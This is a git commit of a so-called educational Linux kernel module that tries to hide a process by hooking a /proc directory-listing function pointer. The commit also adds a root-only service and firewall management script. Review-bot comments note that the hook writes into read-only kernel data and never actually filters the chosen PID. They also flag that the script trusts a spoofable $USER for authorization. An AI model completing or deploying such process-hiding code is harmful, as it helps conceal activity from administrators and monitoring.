authorLibravatarLibravatar Biswa Kalyan Bhuyan <biswa.bhuyan@vegastack.com> 2025-04-16 14:44:25 +0530
committerLibravatarLibravatar Biswa Kalyan Bhuyan <biswa.bhuyan@vegastack.com> 2025-04-16 14:44:25 +0530
commitb6275047fb70c1bbcb161b7c05d20a0d776ac4bf (patch)
treeee1cbee865c79473ebd9ba2bcfb4ab6d181f138d
new init
-rw-r--r--Makefile7
-rw-r--r--README.md47
-rw-r--r--authorized_users.txt3
-rw-r--r--pid_hider.c79
-rw-r--r--service_management.sh135
5 files changed, 271 insertions, 0 deletions
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..6282706
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,7 @@
+obj-m += pid_hider.o
+
+all:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean \ No newline at end of file
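Review bot: Both recipes pass `M=$(PWD)`, which make reads from the caller's environment rather than computing itself, so the build lands wherever the invoking shell says it is (and an unset or stale `PWD`, e.g. under some `sudo` or cron setups, points kbuild at the wrong tree). Use make's own `$(CURDIR)` instead: `make -C /lib/modules/$(shell uname -r)/build M=$(CURDIR) modules` and likewise for the clean target. The file also ends without a trailing newline, which some make implementations warn about.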
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..ca7a730
--- /dev/null
+++ b/README.md
@@ -0,0 +1,47 @@
+# PID Hiding Kernel Module
+
+**IMPORTANT: EDUCATIONAL PURPOSES ONLY**
+
+This module demonstrates kernel-level process hiding techniques for security research and educational purposes only. Using this code to hide malicious processes is illegal and unethical.
+
+## Disclaimer
+
+This code is provided AS-IS with:
+
+- NO WARRANTY
+- NO SUPPORT
+- NO RECOMMENDATION FOR DEPLOYMENT
+
+Implementation of kernel-level process hiding may:
+- Violate computer fraud laws
+- Breach organizational security policies
+- Trigger security monitoring alerts
+- Cause system instability or kernel panics
+
+## Build Instructions
+
+```bash
+# Build the module
+make
+
+# Load the module (specify PID to hide)
+sudo insmod pid_hider.ko hidden_pid=1234
+
+# Remove the module
+sudo rmmod pid_hider
+```
+
+## Legal Notice
+
+Use of this code on systems without explicit authorization may constitute a criminal offense under:
+- Computer Fraud and Abuse Act (CFAA)
+- EU Directive 2013/40/EU
+- Various international cybercrime laws
+
+## Legitimate Alternatives
+
+For legitimate process management, consider:
+- Linux Control Groups (cgroups)
+- Container technologies (Docker, LXC)
+- Mandatory Access Control (SELinux, AppArmor)
+- Process accounting and auditing tools \ No newline at end of file
diff --git a/authorized_users.txt b/authorized_users.txt
new file mode 100644
index 0000000..0ac5f23
--- /dev/null
+++ b/authorized_users.txt
@@ -0,0 +1,3 @@
+root
+admin
+maintenance \ No newline at end of file
diff --git a/pid_hider.c b/pid_hider.c
new file mode 100644
index 0000000..b0b2973
--- /dev/null
+++ b/pid_hider.c
@@ -0,0 +1,79 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+#include <linux/proc_fs.h>
+#include <linux/seq_file.h>
+#include <linux/sched.h>
+#include <linux/sched/task.h>
+#include <linux/pid.h>
+#include <linux/version.h>
+#include <linux/slab.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Research Only");
+MODULE_DESCRIPTION("Process ID hiding demonstration - FOR EDUCATIONAL PURPOSES ONLY");
+MODULE_VERSION("0.1");
+
+static unsigned int hidden_pid = 0;
+module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
+MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing");
+
+static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *);
+
+static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx) {
+ struct dir_context modified_ctx = {
+ .actor = ctx->actor,
+ .pos = ctx->pos
+ };
+
+ int ret = orig_proc_pid_readdir(file, &modified_ctx);
+
+ ctx->pos = modified_ctx.pos;
+
+ return ret;
+}
+
+static int hook_proc_listdir(void) {
+ struct file_operations *proc_fops;
+ struct proc_dir_entry *proc_root = init_net.proc_net;
+
+ proc_fops = (struct file_operations *)proc_root->proc_fops;
+
+ orig_proc_pid_readdir = proc_fops->iterate_shared;
+
+ proc_fops->iterate_shared = hider_proc_pid_readdir;
+
+ return 0;
+}
+
+static void unhook_proc_listdir(void) {
+ struct file_operations *proc_fops;
+ struct proc_dir_entry *proc_root = init_net.proc_net;
+
+ proc_fops = (struct file_operations *)proc_root->proc_fops;
+ if (proc_fops->iterate_shared == hider_proc_pid_readdir) {
+ proc_fops->iterate_shared = orig_proc_pid_readdir;
+ }
+}
+
+static int __init pid_hider_init(void) {
+ printk(KERN_INFO "PID hider: Initializing module\n");
+
+ if (hidden_pid == 0) {
+ printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n");
+ return 0;
+ }
+
+ printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid);
+ hook_proc_listdir();
+
+ return 0;
+}
+
+static void __exit pid_hider_exit(void) {
+ printk(KERN_INFO "PID hider: Unloading module\n");
+ unhook_proc_listdir();
+}
+
+module_init(pid_hider_init);
+module_exit(pid_hider_exit);
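Review bot: `hook_proc_listdir` and `unhook_proc_listdir` cast the `const` qualifier off `proc_root->proc_fops` (L140, L153) and then store through it (L144, L155); the kernel declares `file_operations` instances `const` and places them in read-only data, so this write is undefined behaviour that will typically oops the host rather than fail cleanly, and the module offers no way to detect or back out of that. A comment at L140 should at least state the hazard: `/* NOTE: proc_fops is const-qualified kernel data; writing through this cast is UB and may fault on kernels that map file_operations read-only */`. `hook_proc_listdir` also returns 0 unconditionally and `pid_hider_init` discards that value (L168), so `insmod` reports success in every case, including when `orig_proc_pid_readdir` is left NULL at L142 and the wrapper at L129 would then call a null function pointer. Finally, `MODULE_PARM_DESC` (L119) and the log line at L167 describe an effect that the wrapper `hider_proc_pid_readdir` does not implement (it never reads `hidden_pid`), so the parameter description and the log message should be brought in line with what the code actually does rather than its intended purpose.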
diff --git a/service_management.sh b/service_management.sh
new file mode 100644
index 0000000..dcfa26c
--- /dev/null
+++ b/service_management.sh
@@ -0,0 +1,135 @@
+#!/bin/bash
+#
+# Service Management Utility
+#
+# WARNING: This script is provided for educational purposes ONLY.
+# Unauthorized use to interrupt services is illegal and unethical.
+#
+# PURPOSE: Demonstrates techniques for monitoring and controlling services
+# with proper authentication and logging for legitimate administration.
+
+# Configuration
+LOG_FILE="/var/log/maintenance.log"
+AUTH_USERS_FILE="authorized_users.txt"
+
+# Check if running as root
+if [ "$EUID" -ne 0 ]; then
+ echo "This script requires root privileges"
+ exit 1
+fi
+
+# Functions
+log_action() {
+ echo "$(date '+%Y-%m-%d %H:%M:%S') - $USER - $1" | tee -a "$LOG_FILE"
+}
+
+is_authorized() {
+ if [ ! -f "$AUTH_USERS_FILE" ]; then
+ echo "Error: Authorization file not found"
+ return 1
+ fi
+
+ grep -q "^$USER$" "$AUTH_USERS_FILE"
+ return $?
+}
+
+show_usage() {
+ echo "Usage: $0 [options] <action> <service>"
+ echo "Options:"
+ echo " -h, --help Show this help message"
+ echo " -l, --list List running services"
+ echo " -f, --firewall Manage firewall rules"
+ echo ""
+ echo "Actions:"
+ echo " start Start a service"
+ echo " stop Stop a service"
+ echo " restart Restart a service"
+ echo " status Show service status"
+ echo ""
+ echo "Examples:"
+ echo " $0 stop nginx"
+ echo " $0 --firewall block 80"
+}
+
+list_services() {
+ log_action "Listed running services"
+ systemctl list-units --type=service --state=running
+}
+
+manage_service() {
+ local action=$1
+ local service=$2
+
+ if ! systemctl list-unit-files --type=service | grep -q "$service"; then
+ echo "Error: Service $service not found"
+ return 1
+ fi
+
+ log_action "Executing: systemctl $action $service"
+ systemctl "$action" "$service"
+
+ echo "Service $service $action operation completed"
+ log_action "Completed $action on $service"
+}
+
+manage_firewall() {
+ local action=$1
+ local port=$2
+
+ if [ "$action" == "block" ]; then
+ log_action "Blocking port $port"
+ ufw deny "$port"
+ elif [ "$action" == "allow" ]; then
+ log_action "Allowing port $port"
+ ufw allow "$port"
+ else
+ echo "Error: Unknown firewall action"
+ return 1
+ fi
+
+ echo "Firewall rule applied for port $port"
+}
+
+# Main script
+if ! is_authorized; then
+ echo "Error: User $USER not authorized to run this script"
+ log_action "UNAUTHORIZED ACCESS ATTEMPT"
+ exit 1
+fi
+
+if [ $# -lt 1 ]; then
+ show_usage
+ exit 1
+fi
+
+case "$1" in
+ -h|--help)
+ show_usage
+ ;;
+ -l|--list)
+ list_services
+ ;;
+ -f|--firewall)
+ if [ $# -lt 3 ]; then
+ echo "Error: Missing arguments for firewall management"
+ show_usage
+ exit 1
+ fi
+ manage_firewall "$2" "$3"
+ ;;
+ start|stop|restart|status)
+ if [ $# -lt 2 ]; then
+ echo "Error: Missing service name"
+ show_usage
+ exit 1
+ fi
+ manage_service "$1" "$2"
+ ;;
+ *)
+ echo "Error: Unknown action $1"
+ show_usage
+ exit 1
+ ;;
+esac
+
+exit 0 \ No newline at end of file
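Review bot: `is_authorized` gates the whole script on `$USER` (L217), an inherited environment variable that the caller controls, and it uses an unanchored-in-content regex (`^$USER$`) against an allow-list resolved relative to the current directory (`AUTH_USERS_FILE="authorized_users.txt"`, L198), so whoever controls the environment or the working directory controls the authorization decision. The user should come from `id -un` (or `$SUDO_USER` when elevated), the match should be literal and whole-line (`grep -qxF --`), and the allow-list should live at a fixed root-owned absolute path. `manage_service` has the same shape of problem: `grep -q "$service"` (L248) is a substring/regex match over the entire unit list, and the exit status of `systemctl "$action" "$service"` (L254) is ignored, so "operation completed" and the "Completed" log entry are written even when the action failed. `log_action` (L208) records the same unverified `$USER`, so the audit trail inherits the weakness. The rewritten parts are below; the top-of-file root check, `show_usage`, `list_services`, `manage_firewall` and the `case` dispatch are unchanged.
```shell
# Resolve the acting user from the system, not from the inherited environment,
# and keep the allow-list at a fixed root-owned path rather than relative to $PWD.
AUTH_USERS_FILE="/PLACEHOLDER/path/to/authorized_users.txt"   # pick the deployed absolute location
ACTING_USER="${SUDO_USER:-$(id -un)}"

log_action() {
    echo "$(date '+%Y-%m-%d %H:%M:%S') - $ACTING_USER - $1" | tee -a "$LOG_FILE"
}

is_authorized() {
    if [ ! -f "$AUTH_USERS_FILE" ]; then
        echo "Error: Authorization file not found"
        return 1
    fi
    # -x: whole-line match, -F: literal string (no regex metacharacters from the name)
    grep -qxF -- "$ACTING_USER" "$AUTH_USERS_FILE"
}

# … unchanged: show_usage, list_services …

manage_service() {
    local action=$1
    local service=$2

    # Look the unit up by its exact name instead of a substring grep over the whole list
    if ! systemctl list-unit-files --type=service --no-legend "${service}.service" | grep -q .; then
        echo "Error: Service $service not found"
        return 1
    fi

    log_action "Executing: systemctl $action $service"
    if ! systemctl "$action" "$service"; then
        log_action "FAILED $action on $service"
        return 1
    fi

    echo "Service $service $action operation completed"
    log_action "Completed $action on $service"
}

# … unchanged: manage_firewall, main dispatch …
```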